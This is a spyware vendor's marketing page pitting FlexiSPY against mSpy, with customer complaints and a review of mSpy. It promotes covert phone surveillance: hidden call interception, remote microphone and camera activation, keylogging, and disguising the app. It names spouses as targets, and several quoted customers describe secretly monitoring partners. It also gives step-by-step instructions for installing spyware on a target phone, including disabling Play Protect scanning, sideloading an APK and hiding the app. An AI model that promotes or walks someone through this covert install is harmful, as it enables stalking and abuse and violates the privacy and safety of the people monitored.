mSpy vs FlexiSPY — Proof That FlexiSPY Is The Better Monitoring Application

FlexiSPY is more affordable than mSpy, has more features and is more powerful

Ready to recover your mSpy Losses — then check out our Trade In Program
or
Read on to discover why we win the FlexiSPY vs mSpy contest

FlexiSPY vs mSpy — Comparison Table

FlexiSPY is for the most demanding detectives who leave nothing to chance.

Look below for proof that FlexiSPY is more affordable, has more features, and is more powerful

$19.99
$29.99
Price
Completely hidden on Android 11
Phone Call Recording
Phone Call Interception
Read IM Calls
Record Phone Surroundings
Listen to Phone Surroundings Live
Take Photo/Video with Phone Camera
Buy Now

FlexiSPY — The Original Since 2006

At FlexiSPY, we know a thing or two about how to make reliable mobile monitoring software — because we created the spyphone industry in 2006  — and have led the pack ever since.

Think of FlexiSPY as the master craftsman against the low cost counterfeit sweatshop.

Since 2006, when we created the world's first spyphone — we continue to design, develop, test, market and support all our own products — nothing is outsourced and everything is done under one roof.

All this adds up to a better product and strong customer satisfaction — unlike most others, who are just marketers reselling inferior technology sourced from the lowest bidder.

Choose FlexiSPY, and you get the innovation, reliability and quality that comes with fourteen years of experience developing a technology that has been used by millions the world over.

Unique Product, Unique Features

Let's look at just a few areas where our differences shine through

Focused on Instant Messaging

For the younger generation, SMS and Phone calls are dead — it's all about social media and instant messengers. FlexiSPY is designed to be the premier instant messaging monitoring application with features such as capturing both sides of the conversation, and the ability to view stickers.

Monitors All Audio Streams

Unlike mSpy, FlexiSPY allows you to listen to and record audio from sources likeregular phone calls, and IM calls like those made over Facebook Messenger.

Powerful Remote Control

Turn your phone into a remotely controlled camera and video recorder — open the phones microphone to listen to surroundings.

Free FlexiVIEW Mobile App

Access recent and critical data on-the-move with our intuitive mobile viewer app for Android and iPhone — free with every purchase.

Always Know With App Screenshot

IM’s update all the time. When this happens competitors rush to play catch-up to update their software, and you lose out on valuable chats.

Our unique app screenshot feature means when an app like WhatsApp is updated, you won’t notice because you’ll still be able to see screenshots of the chats.

Has The Best Data Security

Customers rarely think about data security until hacks happen.

Skipping security makes the price of monitoring apps lower, but there are real consequences to ignoring security.

We are proud to say that FlexiSPY has a 100% perfect track record when it comes to its customer's data being compromised.

Unfortunately, our competitors can not say the same.

Check out the hacked spy app hall of shame

The Best For Value

Value means different things to different people.

Whether you're a budget conscious buyer, or a professional who cannot compromise on being able to get every piece of information available, FlexiSPY's product range has you covered.

From our FlexiSPY LITE product — which is the most affordable in the industry — to FlexiSPY EXTREME, which is unique in the industry, we have something that's perfect for everyone.

You Don't Have To Take Our Word For It

Here’s what customers who made the switch to FlexiSPY using our Trade-In Program had to say about mSpy

(By the way, mSpy get's the lowest rating of from Better Business Bureau. See here)

Dec 4, 2020

Well I couldnt get it figured out so I payed and 12.99$ + 1.00 for help and they were no help at all.

a****2@gmail.com

Dec 3, 2020

Always disconnecting and very unreliable.

j****1@gmail.com

Dec 1, 2020

3 aylik sure bosa gitti.

m****7@gmail.com

Nov 30, 2020

Didn't work as advertised at all. Really disappointing.

s****i@gmail.com

Nov 28, 2020

Not Screen recorder doesn't do anything, also wondering if your product shows messages notifications are turned off for, because I'm testing it on my phone and don't see messages I have notifications turned off for on it, like facebook messenger especially, also does your app offer geofencing like theirs?

b****t@gmail.com

Nov 27, 2020

Not working or updating like it says I need access to the target phone.

e****4@gmail.com

Nov 24, 2020

Not working or updating like it says.

k****r@gmail.com

Nov 16, 2020

I just heard you guys were better.

m****l@gmail.com

Nov 13, 2020

It wouldn’t do or record barely anything on her phone and she was a cheat in ass how i need better service than they offered

i****1@gmail.com

Nov 13, 2020

I'm not at all satisfied with mspy
l the screen recorder no longer works since October 9
there are not as many functions on flexyspy I took the extreme subscription I am not disappointed
can you get a refund please

i****n@gmail.com

Nov 11, 2020

I didnt read the fine print basically. But Flex has way more options than Mspy

t****i@gmail.com

Nov 8, 2020

I was using Mspy for a non-jail broken iphone, and I’d gone through customer service to resolve the issues that I had, and they assured me it was just their system being buggy and extended my subscription an additional two weeks, though the issues never got resolved. I would enter the iCloud information (email and password) and have the two factor authentication code sent to the target phone, enter it precisely on my end, and the code would be presented to be invalid. When I would hit the “re-enter code” option, it would automatically send a new code and then THAT code would be presented as invalid. It was a cycle of codes being sent via text to the target device for the two factor authentication to clear, and yet none of the codes have worked. Not once. I’ve tried this on multiple occasions with a good amount of time in between. So I gave up, and now am down almost $100towards Mspy, I paid for 1 of their available subscriptions and 2 more add ons to ensure it would work. Though it never did it’s job in the first place.

i****x@gmail.com

Nov 8, 2020

i first orderd their3 month plan and they charged my card twice, when i called instead of refunding me the second charge they just added a bunch of days to my plan which u can see on the screenshot, my issue is that its very hard to look through the logs and i dont have access to most premium features they just dont work.

m****y@tuta.io

Nov 8, 2020

Icon is now visible on new Android ..always losing connection with monitored device, slow updates.

d****e@aol.com

Nov 3, 2020

It never worked properly. Never able to get phone or text logs, browser history constantly.

b****4@gotmail.com

Nov 3, 2020

When the target phone is  turned off, on turning back on the app doesn’t work anymore. Customer service  says to reinstall which I did. Only very few features work. In addition we are  getting a pop up message from google play protect regarding app detected and  provision of easy button to uninstall mspy. Customer service is poor too.

n****d@gmail.com

Nov 2, 2020

No graba llamadas.

d****e@gmail.com

Nov 1, 2020

Suddenly logs stopped appearing. I tried to contact them several times last month. From chat I got told they would respond on email. Didn't hear anything. And today they actually charged for a subscription number two, when I actually wanted to cancel.

m****r@gmail.com

Oct 31, 2020

iphone data transfer is slow

a****7@gmail.com

Oct 31, 2020

Couldn't get it to connect to either phone's and when we finally did get it on one phone it would'nt connect with the other one they Claim it is so easy but it's not after4 days I requested a refund and nothing

k****9@yahoo.com

Oct 28, 2020

doesn't update, screen mirror feature worked only one day . waste of money! I wouldn't recommend to anyone. I purchased because it was expensive full of promises but did not work AT ALL even key logger gave me letters at a time not definite messages

j****1@gmail.com

Oct 24, 2020

ISSUES ENCOUNTEREDAFTER PURCHASE :
- 3 failed installation attempts
- Important features and functions doesn't work properly i.e. FB Messenger does not sync with few delays and incompatible issues
- Phone prebuilt virus scan detect the application as "Trojan" being a malicious threat running on background
- System has restrictions on Oppo A5 2020 / Model CPH1931 / Version Android 9as target mobile phone.

j****o@outlook.com

Oct 22, 2020

Very difficult to use and customer service was horrible.

c****t@gmail.com

Oct 19, 2020

Most features require the target phone be rooted, but they don't recommend doing it. ?? A lot of the remaining features froze after a few days.

s****7@gmail.com

Oct 12, 2020

The connection always breaks.

m****m@gmx.de

Oct 10, 2020

Product has not delivered all requirements as advertised and suddenly one day just stopped.
Technical dept gave me the run around mind you i am a premium customer and 4years using the product not pleased with thier response.

r****b@gmail.com

Oct 7, 2020

Required Apple ID and Password for phone.

m****3@gmail.com

Oct 4, 2020

Didn't work as expected.

l****3@gmail.com

Oct 1, 2020

Product is not working on iphone.

l****u@yahoo.com

Oct 1, 2020

whatsapp do not update all connection lost.

m****y@gmail.com

Oct 1, 2020

Error code for three days  on target phone. It finally says it worked on Monday but when I check my  dashboard there is no information.

j****r@gmail.com

Sep 30, 2020

Just didmt do all it said.

m****9@gmail.com

Sep 29, 2020

It sucks, the refund policy is bullshit, installation process is complicated, I would much rather just deal with FlexiSpy.

j****7@gmail.com

Sep 25, 2020

whattsapp need root

m****7@yahoo.com

Sep 22, 2020

Mspy completely screwed up  my husband's phone... It couldent hardly even take a phone call after  installation...

k****a@yahoo.com

Sep 21, 2020

I didnt l’île this produit.

l****i@sfr.fr

Sep 18, 2020

Its lame.

d****6y@gmail.com

Sep 16, 2020

It did not work well and I  did not do the things that it was supposed to do.

c****6@outlook.com

Sep 13, 2020

It doesn't record calls and also can not hear the surroundings.

n****g@outlook.com

Sep 11, 2020

Couldn't access most info without root, and kept stopping working.

s****01@gmail.com

Sep 7, 2020

It keeps losing connection to target device. It also doesn’t have the same monitor capabilities as it said, and what it does do is limited. I also wanted the free trial and didn’t get one at all. And there customer support is lacking you submit a ticket or pay separately for it.

b****0@gmail.com

Sep 3, 2020

It wouldn’t load any of the androids data.

j****0@gmail.com

Aug 31, 2020

L'application ne transmet aucune informations du téléphone surveiller.

m****9@gmail.com

Aug 28, 2020

Not updating facebook activity. No call recording or sms commands.

c****n@gmail.com

Aug 23, 2020

Не выполняетобещанные функции.

s****o@mail.ru

Aug 20, 2020

the competitor product does  not meet my expectations, a lot of data does not appear. very disappointed  with this product.

l****i@sfr.fr

Aug 20, 2020

Customer support couldn’t explain the difference between logs for ‘call’ vs ‘phone’ and other questions I had with regards to what I saw on the dashboard. Also wasn’t logging any 3rd party apps as advertised.

a****3@gmail.com

Aug 18, 2020

It didn't work for any social media application whatsapp, instagram, etc ...

w****o@gmail.com

Aug 18, 2020

I could not hide the icon, they could easily uninstall the app and change the settings from the app,and it would not stay connected for more then 24hrs, the sms code did not ever reactivate so I would have to uninstall and reinstall everyday. I did not have physical access (which is required) to the phone that often. It shows in the phones settings as and easily detectable and could be uninstalled. It was found by every antivirus scan every time. There was nothing spy, stealth or covert about Mspy.

x****n@gmail.com

Aug 17, 2020

can't access no-jailbreak option with 2FA.

c****d@gmail.com

Aug 17, 2020

Disconnect
Customer service is aggressive
Icon don't hide
Misleading information

h****h@gmail.com

Aug 16, 2020

Hasn't logged anything accurately since it was installed. Keylogger is even buggy. Everything is just wrong and doesn't work. Especially not for a 200$ price tag.

a****7@gmail.com

Aug 16, 2020

Constant disconnects& stops recording data. Have to re-install frequently only to have it stop working again. Received the "bonus" license that runs through January 24, 2021

j****0@gmail.com

Aug 11, 2020

The mSpy application initially installed and operated properly, but after about a week it stopped. I followed all their lacking instructions on how to resolve but nothing worked. I totally uninstalled and reinstalled and it still nothing. I have given up on them.

s****u@gmail.com

Aug 6, 2020

Stopped showing me anything after 2 days. Waste of money.

m****5@gmail.com

Aug 3, 2020

Screen mirror stopped  working no notice at all when i ask why and was unreliable on key logger.

g****7@gmail.com

Aug 2, 2020

GPS logging didn't work well and calls were not recorded.

j****2@gmx.at

Jul 22, 2020

I purchased the product because i wanted to have recordings of the latest incoming calls and play the whatsapp audio voice notes as well, they told me that the product didn't have those features and denied the refund. They just offer me 4 premium extra months for free, but for me is not worth fit as it doesn't fill my needs.

d****a@gmail.com

Jul 16, 2020

1. Product not working AT ALL
2. No one ever picked up the CS # listed
3. KnowledgeBase Portal - F

z****n@gmail.com

Jul 16, 2020

I havent even been able to set up the monitoring on the the mobile device because the mspy website to login is NEVER available.

m****s@gmail.com

Jul 15, 2020

Couldn’t figure out how to use it. Needs to jail broken when it’s says it doesn’t.

a****1@gmail.com

Jul 14, 2020

The app cannot sync with my IOS target device. There has not been one bit of information displayed in any of the monitored fields since I got the subscription weeks ago. They have continued to extend my subscription by two weeks twice now while waiting for the issue to be resolved but now another month has gone by and I have no information from the target device. I could wait to see if they resolve the syncing issue but it’s another week just for an update on the issue, I’d rather try another company, as my experience with MSpy is proving to be expensive and useless.

s****w@gmail.com

Jul 9, 2020

Unreliable.

s****t@gmail.com

Jul 5, 2020

Service is not good its very different to what it is advertised.

a****b@gmail.com

Jul 2, 2020

data never updated in the  account, even after I reinstall and send the "1000000" message.

c****s@gmail.com

Jul 2, 2020

Not working, just a  technical problem after Apple update. No live monitoring.

a****a@abwesend.de

Jul 1, 2020

Never worked at all.

j****2@yahoo.com

Jun 25, 2020

I need to have icloud backup on the phone which is not able to be done due to not enough storage.

e****1@gmail.com

Jun 24, 2020

I waited the 24 hr recommended time frame for iCloud to back up. Never received any of my son’s activity. Called MSpy and was sent directions to follow. I did that and still no activity is showing. It has been almost a week and we have done everything recommended with no results. They will not refund us and the customer service reps I’ve spoken with are crass and flat out rude.

s****6@gmail.com

Jun 23, 2020

The software never worked. I downloaded and installed and waited 15 hours for the software to transfer information from the target phone. The circle just kept spinning, no information was ever transferred. The software never worked.

n****0@gmail.com

Jun 22, 2020

In the beginning, I could not establish a healthy connection to the target phone, there was a continuous interruption. There was no connection for abo.

f****4@hotmail.com.tr

Jun 16, 2020

Only shows text messages, calls, and takes for ever to update sometimes more than 24 hours already spoke to them and they say i have to root the target cell and they want to charge extra for that.

i****9@yahoo.com

Jun 11, 2020

Can not get around 2FA.

r****e@comcast.net

Jun 9, 2020

Doesn’t upload constant bugs.

t****t@protonmail.com

Jun 7, 2020

First I bought it. I tried it on my mobile phone which is redmi7, key-logger didn't work as well as half of the functionality. I contacted support they ensured me that on my kids device it will work fine which is s10... Guess what? Instead of it EVERY functionality is now broken on my kid's phone. Nothing works at all, and when I ask cash-back they just send some useless templated answers. Right now when I made this screenshot my kids phone is in my hand connected to wifi!

r****n@gmail.com

Jun 7, 2020

It was promised tha I will be able to see images,videos, IM whatsapp and more in Premium version.
But I could only check basic things like call log and SMSs.


s****2@gmail.com

Jun 5, 2020

Delays and always unlink with monitored device.


i****s@yahoo.com

May 31, 2020

It did not work for anything. Not even GPS. What little did work (keylog) was delayed by 24hrs or more and half of it was labeled 'encrypted sms', 'system ui', 'deleted message', '****', or other useless information. Horribly disappointed despite the great reviews mspy has!!!!

j****y@comcast.net

May 22, 2020

i was hacked, never received anything like advertised.


c****n@gmail.com

May 21, 2020

crashing, too many delays, didn't see a lot of social media content, had to keep going back to tech support, issues over the software (the phone was a Samsung S8+).

af****7@gmail.com

May 20, 2020

I was never able to use the service and would not help guide me.


a*****7@gmail.com

May 17, 2020

Stopped working due to no  internet, no social media information as promised, geo fencing map doesn't  show usa, date and time are wrong.


a*****6@gmail.com

May 16, 2020

The installation didn't work took me days to have them reactivate my account because i couldn't get the target device unlocked until then. They did the remote installation and from that point on nothing but headache. Calls and texts and location never updates right and is missing a bunch of information. The browser history thats a joke and email well not 1 thing at all. They check and say its good on their end and still no change. This is worse then me figuring out things to late and the hard way.

p*****r@gmail.com

May 15, 2020

There is a huge lag time, and does not record phone calls.


m*****m@gmail.com

May 12, 2020

so i purchased MSpy and for the first day it worked and I was a very happy customer. I had used Safe Lagoon in the past but got fed up with the inconsistency of the app. I did a lot of research and decided on MSpy and in fact added my other childs phone as a secondary phone. This is why the cost is what I showed since the price is for 2 devices. Then on day 3 that is when i started to have major issues. I contacted MSpy multiple times only to get an email stating that they were looking into the problem. I am now on day 10 and still no resolution. I came across your app while trying to see of anyone else was having issues with MSpy. Since I have 2 teenagers I need to have an app that I can rely on that will provide GPS locator that actually works and will allow me to monitor the websites that they visit. I also want to make sure that the people that they hang out with and text are not trying to encourage bad choices. I also want to make sure that both kids aren't aware that I am checking up on them so need an app that runs without them knowing that and so that they aren't able to delete the app. I spent a lot of money on the MSpy app just to have it end up not working even after verifying that wifi on and the device working for all other apps on them.

d*****n@att.net

May 12, 2020

Need other phones apple id and password.


a*****a@gmail.com

May 1, 2020

They told me they jould jailbreak, took my money then suspended my acct. untill they could jailbreak the target iphone xr. strung me along for 8 months. I now have purchased an iphone 11 for my niece with no 2fa on it. saw what you offered,and it appears you have so much more to offer, when you can support this model.

b*****t@gmail.com

Apr 29, 2020

It isn't showing location , no emails at all. Sporadic texts and calls.


b*****7@gmail.com

Apr 29, 2020

it never worked at all.


j*****9@yahoo.com

Apr 21, 2020

It wouldn’t connect to my targets device and customer service was absolutely awful.


f*****d@gmail.com

Apr 21, 2020

Reinstalled it 4 times ,after a day or two it stops sending data,I have been their customer for more than 3 years and I know how to use it, all they say connection is lost send 1000000 code, if this is what is going to happen with you either I have no idea what I am going to do,maybe it is the 5G causing all this,or the heavy duty on networks or Wifis because of the pandemic:(

f*****z@gmail.com

Apr 19, 2020

It's super flawed, customer service sucks, and we are paying for a service which we should have customer service active and professional help, at least to say that they can't hold up to they word they advertise to do! I am completetly disaapointed with this company as it shows no professional values on their customer service representatives, that means a LOT of what a company has to offer

n*****5@gmail.com

Apr 17, 2020

Doesn't update when it  should sometimes. Unable to view Snapchat and other social media as the  product describes on a rooted device.


f*****r@yahoo.com

Apr 14, 2020

the icon is still there, its missing surround sound recording


r*****m@gmail.com

Apr 7, 2020

Desde que me suscribi no me llegan los mensajes enviados ni recibidos por el teléfono monitoreado y las ubicaciones recibidas son todas incorrectas, tampoco el historial de navegación aparece. Es un verdadero fraude, no me sirve de nada lo único que me llega de información son solo los contactos nadamás

j*****8@gmail.com

Mar 23, 2020

This product is not as advertised. I am currently a spyzie customer and after the renewal it has started to glitch. I looked for another company and unfortunately stumbled across mspy which does not provide the features needed for my family. I asked them to refund my account as it was never installed, they informed me to read the fine print.

k*****s@gmail.com

Mar 17, 2020

Satın aldığım günden beri güncel bilgileri hiç alamadım hiç memnun kalmadım çok kötü bir program ve whatsap yazışmalarını da göremiyorum müşteri hizmetleride çok kötü çok uzun süre bekletiyor doğru düzgün açıklama yapmıyor canlı destek aldım ona da para ödedim fakat tam bir fiyasko o hizmetten de faydalanamadım param boşa gitti. Tam anlamıyla berbat.

f*****4@hotmail.com.tr

Mar 12, 2020

App did not update as advertised. GPS not accurate. I could see where phone location actual. Did not match app. App showed GPS locations previously visited and those not actually visited. Once showed location 6 hours away. verified visually to be false.  Recorded phone calls and message monitor only helpful info.

ykz****@gmail.com

Mar 05, 2020

Did not log all text messages, no photos sent, re wives, or downloaded were logged. Data from address book wasn't provided on phone or messaging logs and sometimes the phone number wasn't even provided. Unable to block calls. No incoming calls or messages were logged. I only monitor a few basic things (texts, calls and Facebook sometimes but despite promises, the program offers very little information for the amount charged. Generally unhappy.

ma***a.j****ki@icloud.com

Mar 05, 2020

Was not compatible anymore to the updated system and kept on disconnecting even after many reinstalls.  Customer service took long to get back to me. The instructions for reinstalling it was very complicated and confusing. It wasn't worth the price it asks for.  Never rewarded my member discount to future subscriptions.

mad****12@gmail.com

Mar 04, 2020

Very unreliable and their satellite updates are impossible to keep up. Tracking the phone was bad, it would say that the target device would be 4 miles from location when I knew that was impossible due to the time. This product does not do what it says it does.

mari******72@yahoo.com

Mar 03, 2020

FlexiSpy seems to be a better fit for my needs. I could not get mSpy to work on the phone. I was attempting to install it on. I'd like to try FlexiSpy to see if it will be a better fit and like some of the additional stealth options. Thanks.

cka*****@gmail.com

Mar 03, 2020

The software did not work as promised but was blamed on network issues and or device itself. But I do not think any of their reasons are true. They probably did not want to give the money back. I attempted to explain to the representative what was happening many times but they did not care.

ava******17@gmail.com

Feb 14, 2020

Had to install app on target device but still showed you down loaded the app. What is the point if they will know you are hacking their device when they see the app installed? Just want it to install without the target device knowing it is there. Really smart when you see the app so you check it out. Its all right there in the app decription. Not what i wanted. Didnt figure that out until payment was made. Felt like a waste with no how to before. That would be nice. But now im looking at this to see if it really works

hap*****a@yahoo.com

Feb 12, 2020

The Target device is Samsung s8 SM G 950 f rooted android 9. I bought mspy since 28.12.2019 but it is do not works like advertised. The mspy team tried many times to make it work but without any Result. The problem is No whatsapp massages no pictures no videos no calls no Web browsing history and i can not Read Messaging Apps and can not View Multimedia Files . I waited a long time but it is do not work . I stopped it and asked for my refund . They said wait and till we can fix the problem and give you free 3 months but i dont think they can fix it and i dont wait to wait more. Now i want to try Flexispy, so i want change my Annual subscription from Mspy to Flexispy.

Thank you

swe********8*@gmail.com

Feb 05, 2020

Les messageries des réseaux sociaux et autres applications telle que whatsapp ne fonctionnent pas du tout !!! L'appareil cible ne prend pas en compte toute notification arrivée qui serait supprimée dans les deux minutes. L'utilisateur a donc la possibilité de supprimer des données sans qu'elles n'apparraissent sur l'application. Je me suis retrouvée un soir dans l'impossibilité totale d'ouvrir l'application sur mon mobile. Le service client refusait de prendre la main pour régler le problème alors que je n'y parvenais pas moi-même. Délai d'attente très long pour le jailbraik du mobile cible. Au début le site ne memorisais pas le français j'etais a chaque fois obligé de faire le changement de langue a chaque ouverture du site

vir********@gmail.com

Feb 03, 2020

Lost connection, wouldn’t display all text/calls/locator

Locked me out of account for 3 days. Couldn't get chats answered. EverytimeI logged into account there would be missing data or it was all jammed No customer service reps to talk to.

jeri******ca@yahoo.com

Feb 01, 2020

I watched a video on u tube and thought I could install the app with out having access to the target phone. I attempted to do so but was unable to. I'm trying to locate the phone to recover my vehicle that my x took from me. I reported it the police but bc he lived w me Its only considered a unauthorized use of

a motor vehicle instead of stolen. He has refused to return it to me unless i allow him to come back home.  My x is a clinical narcissist and despite my heart ache there can be no reconciliation.  My relationship with him is toxic and he is violent. To which I refuse to subject myself to again

JSR*******@GMAIL.COM

★★★★★

I cant see text messages and phone calls or keylogger info since december 20 2019. Also every time I call mSpy to get help they remotely log in to the targets device and say give it 30 minutes and nothing works. I also just found out that the target can see the mspy on Android 10. So now I think the target erased the software or did something. I really need help and I was told that mSpy was the best spy ware out at this time. What can I do to get your software?

Jason

★★★★★

My issue with mSpy: no phone calls, no ambient recording, no images/photos received/sent in facebook messages

Geral

★★★★★

mSpy lost connection all the time, wouldn’t display all text/calls/locator, Locked me out of my account for 3 days. Couldn't get chats answered. Every time I logged into account there would be missing data, No customer service reps to talk to.

Jerimen

More independent reviews on mSpy here

Recover Your mSpy Losses With Our Trade-In Program

Recover your losses by trading in your mSpy license against a copy of FlexiSPY. Join over 1600 spy app enthusiasts who have switched over to FlexSPY.

Explore FlexiSPY FeaturesTrade-Up To FlexiSPY

Still need more information?

Read our Full mSpy Review Below

What is mSpy?

mSpy is a mobile monitoring app marketed as a parental control software to help keep your children safe. Once installed on a target device, mSpy records activity logs such as incoming and outgoing calls, SMS, emails, and more. This data is then transferred to your web-based portal at certain time intervals which you designate, with 5 minutes being the minimum.

Before we proceed, please note that mSPY's iCloud spy app does not work in most circumstances. And although mSPY offers an iPhone jailbreak package, it offers few features and little value for money. In fact, there is only one company that truly offers Reliable iPhone Monitoring.

Usefully, with mSpy you will also be able to restrict certain actions with features such as call blocking, website blocking, and app blocking on Android devices (not available for IOS).

Let’s begin by exploring what devices mSpy is compatible with.

Which Devices Are mSpy Compatible With?

Android Devices

  1. Compatible with Android 4.0 or higher
  2. Requires physical access to device
  3. Tracking Instant Messengers, Wi-Fi networks, Emails, and other advanced features will require rooting

iOS Devices (Non-jailbroken)

  1. Compatible with all iOS versions
  2. Requires iCloud login credentials
  3. Does not require physical access to device

iOS Devices (Jailbroken)

  1. Compatible with iOS 6-8.4 or 9.2
  2. Requires physical access to the device

mSpy is compatible with Android and to a certain extent, iOS devices. After extensive testing, we found mSpy’s iOS product to be lackluster when compared to their features available on Android. Also, mSPY is not compatible with devices that operate on iOS 10 and above which means it will not work on the latest iPhones.

Note that you can’t download mSpy from Google Play or App store. The official app is only available on the mSpy site.

Features & Pricing

Although offering the same or similar features to most phone monitoring apps, mSpy positions itself as the go-to product when it comes to parental control software.

They offer two packages: Basic comes in at $29.99/mo and provides you with bare-bones data of the activities on a target device such as call logs, photos, and videos.

Premium begins at $69.99 and gives you access to instant messenger logs, keylogger, as well as call, app, and website blocking.

Features Table: mSpy Basic and mSpy Premium for Android

mSpy Basic $29.99 gives you:

Upgrade  to mSpy Premium $69.99 to get:

  • Call logs
  • SMS & MMS
  • Photos
  • Videos
  • GPS Location
  • Emails
  • Calendar, Contacts, and Notes
  • Browser History
  • Call blocking
  • Website blocking
  • Application blocking
  • Keylogger
  • Messaging apps
  • Geo-fencing
  • Wi-Fi networks

mSpy’s Standout Features for Parental Control:

  • GPS Tracking
  • Restricting inbound calls
  • Blocking calls, websites, and apps

Notable Drawbacks:

  • Lacks features of a true spy app; mSpy does not record phone calls or IM calls
  • Key parental control features such as key logging and app/website/call blocking unavailable in mSpy Basic
  • No screenshots feature (app screenshots provide a backup that will allow you to see all user activities and are vital when other features are for example, getting tweaked or updated).
  • Limited iOS product that has no advanced features and does not work on latest iPhones
  • Question marks regarding overall viability of mSPY’s IOS product

mSpy's Packages

Your choice of package will depend on your planned budget and specific needs.

Are you on a tight budget and only require minimal data into the user’s mobile activity? If so, mSpy Basic might be a decent choice. On the other hand, mSpy Premium can be useful if you want to have restrictive controls over the target device.

However, if are you looking for an advanced package which offers real and actionable insights with features such as call recording, live listening, ambient recording, and IM call recording – then there’s no choice but to go with the original spy app.

Visibility

If you are looking to monitor a mobile device without the user’s knowledge, then discretion is of the utmost importance. For this purpose, mSpy does provide a camouflage for its app.

Once the installation process is completed you will be prompted to choose whether you’d like mSpy to be hidden or visible.

In this case, hidden does not mean mSpy is completely undetectable, but rather disguised as another application on the target device. Find out more below.

mSpy's Support

mSpy offers three levels of technical support:

  • Free service for Basic and Premium Subscriptions – access to email support and live chat
  • Support Priority Line for $12.99 –Access to phone support, installation walkthroughs. As stated on their website, this service is optional and non-refundable.
  • mAssistance $53.99 – rooting/jailbreak assistance,installation through Team Viewer, detailed help setting up features, 24/7 technical assistance over the phone.

mSpy allows their customers to pay extra for additional support. As advertised on their website and in their portal, the higher the tier of customer service level on your subscription, the higher the priority you will be given.

Data Security

Having learnt from previous mistakes, mSpy now have implemented security protocols such as data encryption and 2FA. According to mSpy, there is no reason to worry that your account info and child’s data being involuntarily disclosed or available elsewhere.

Despite assurances, it’s important to be aware of mSpy’s history of data leaks — a cautionary tale regarding parental control apps which can be explored further below.

Who uses mSpy?

Parents

mSpy let’s parents monitor child’s activities such as websites visited, calls, text messages, and GPS locations.

Employers

Keep tabs on employees and their location while on the clock. Monitor their websites, work schedules, and time spent on company mobile devices.

Spouses

mSpy disguises itself as a ‘Update Service’ app on a target device, this can help you track your spouse’s movement and monitor all phone activity.

Is mSpy detectable?

When it comes to spy apps, to get real value and insight it’s important that the software always remains hidden.

And although mSpy is not a ‘true’ spy app and claims to be for parental control only - having children know they are being monitored can be counterproductive to keeping them safe as they can easily find ways to get around surveillance.

For example, once informed that they are being tracked, what stops the child or teenager from simply manipulating the data their parents are privy to? Thankfully, mSpy provides the user with the option to either hide the app or make it visible.

Initially, after you download mSpy on the target device you will be asked if you want to hide or keep the mSpy icon. If you choose to hide, an icon titled “Update Service” will appear in the phone’s menu, this is in fact the mSpy app.

For Android 9 OS and below, this icon will not appear in the app home page nor the phone’s menu. However, note that ‘Update Service’ icon will appear and remain in the applications list under Settings. Meanwhile, mSpy’s development team is currently working on a way to hide the app icon on Android 10 devices.

It’s safe to say that regardless of the device model you are looking to monitor, traces of mSpy and its installation are not necessarily concealed, but rather disguised.

Screenshot showing mSpy visible on Android 10

Furthermore, mSpy’s restrictive features (call blocking, app blocking, website blocking, Wi-Fi blocking) mean that the target device owner will always be aware that they are being monitored. This may not be significant if you are looking to monitor your children openly and have total control and access to the target device. Still, if you are looking for more discrete surveillance, mSpy will prove problematic as these features mean the app is never truly hidden.

How to Install mSpy on an Android Phone

Here's an overview of how to install mSpy on an Android phone.

  1. Take the target phone, make sure that it is unlocked, charged and that there is an Internet connection available.
  2. Since mspy is a parental control app and not a spy app there should be no need for secrecy. And it would probably be wise to involve your child in the installation process from the get-go to keep things as transparent as possible.
  3. Go to Play Store > Menu button > Play Protect > Settings (cogwheel) > Disable Scan device for security threats
  4. Download mSpy (here you select between Android and iOS)
  5. Open the target device's browser (use Google Chrome), tap on the address bar, enter the link on the screen (http://b55y.net/a) and press GO button. Enter the verification captcha (draw the shape or enter letters) and once successful click Download.
  6. Click Open once the download is finished to start the installation
  7. After opening the bt.apk file,you will need to follow the sequence: Next Install Open
  8. Install mSpy
  9. Finish Download
  10. Select to make mSpy hidden or visible
  11. To make sure that mSpy runs smoothly on your target (child) device, add it to Un monitored apps:
  12. Go to Settings > Device Maintenance > Battery > Unmonitored apps > Add apps > Update Service > Done
screenshot of mSpy installation steps

If you experience any difficulties during installation, mSpy’s customer service is advertised to be on-hand 24/7 to help you with any inquiries. If their ‘free’ customer service proves unhelpful you may want to consider upgrading to mSpy’s ‘paid’ (Support Priority Line) or ‘uber-paid’ (mAssistance) customer service tiers.

In our opinion, the best spy apps will provide you with quality technical support free-of-charge as well as a worry-free installation service where for your convenience, a technician will remotely install the software for you. All you’ll have to do is connect the target device to a PC or MAC.

Is mSpy a real Spy App - or is it just for Parental Control?

As seen from their marketing focus, mSpy frame themselves as being a parental control app, rather than a true spy app.  They have a number of restriction-based features such as app, call, and website blocking — but lack features you'd expect to find in a serious spy app — features such as call recording, IM call recording, live-listening, ambient recording, and so on.  

And while mSpy make the case for being the choice for parents who want to protect their children, there is a valid argument that says that restriction-features are counterproductive as it's obvious to the child that there's a monitoring app on their phone and so the child simply deletes or disables the app.  

If you are looking an app with serious features and depth, FlexiSPY is designed to remain hidden and offers over 74 features compared to mSpy’s 42. Many of which, including GPS Tracking, SMS and IM Chat Monitoring, also work well as parental control mechanisms.

Is mSpy an Effective Parental Control app?

mSpy is a good app for giving you the big picture of your child’s mobile and online activities. However, it does not offer real-time protection with the biggest drawback being the delays in data uploads.

In the portal, you can set data to be uploaded every 5, 10, 15, 30, 60 minutes and so on. However, after extensive testing we found that most features took at least half an hour to upload despite being on the 5-minute data upload interval setting – while other features such as photo and video capture took several hours to upload.

If your child was setting up a meeting up with a stranger via an instant messenger app, the data you receive is not immediate. Meaning that you as a parent really won’t have adequate time to react or prevent any wrongdoing. You will however have the evidence you need to discipline your child, to hand over to law enforcement, or to take any other remedial action required.

On the other hand, mSpy’s iOS product offers minimal features (with no advanced features such as call, app, or website blocking), and what little data it does track is only updated once every 24 hours. This is certainly not ideal for preventing or correcting your children’s misbehavior in a timely manner, nor does it help with any imminent threats to their safety.

Is mSpy a Reliable Spy App?

When you pay a premium for a spy app you should be able to expect:

1. Features to work as advertised

On paper, mSpy offers an impressive depth of features, however the app is reliable only to the extent that the user merely requires a broad overview of mobile activities over a flexible time-frame.

At the time of testing, mSpy’s social media tracking, email tracking, and call blocking were nonfunctional. Upon inquiry, their customer service promised an update which would fix all issues within a few weeks.

When it comes to your child safety you should be looking for consistency. Unfortunately, many of mSpy’s most important features will often not work due to error, network provider or phone provider security measures (see mSpy’s iOS product).

When this happens, mSpy’s customer service will inform you that the only option is to wait for their team to fix the problem. Often, if they are unable to help you will be offered a complimentary 1-2-week extension to your subscription as a compromise.

